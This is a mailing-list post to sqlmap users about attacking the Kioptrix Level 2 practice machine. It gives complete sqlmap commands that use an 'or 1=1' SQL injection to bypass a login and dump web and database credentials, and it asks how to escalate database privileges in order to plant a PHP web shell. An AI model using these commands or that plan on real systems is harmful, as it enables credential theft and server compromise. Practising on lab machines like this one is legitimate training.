hello:

I discovered a vulnerability that allows me to bypass the login screen. Btw,
this is the Kioptrix Level 2 puzzle and not a live client/target.

I've managed to dump credentials for the administrator's web interface in
addition to the database users themselves. There were a few recon commands
but the meatiest items are below.

Specific commands included:

>sudo python sqlmap.py -u "http://192.168.1.1"
--data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
--string="Ping" -D webapp -T users --dump --proxy=http://127.0.0.1:8080 <---
gets me user credentials for the webapp

>sudo python sqlmap.py -u "http://192.168.1.1"
--data "uname=blah&psw=30' or '1'='1" --dbs --level 5 --risk 3
--string="Ping" --passwords --proxy=http://127.0.0.1:8080 <--- gets me user
credentials for the DB.

However, I've discovered that the db user that I am running as does **not**
have the appropriate privileges to write files to the system.

My objective is to write something like phpshell to the /var/www directory
and go from there.

Is there a way for sqlmap to switch from unprivileged user A to privileged
user B if I have both sets of credentials?  If so, I can then use the
"file-write" and "file-dest" options.

thanks,

-pb
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users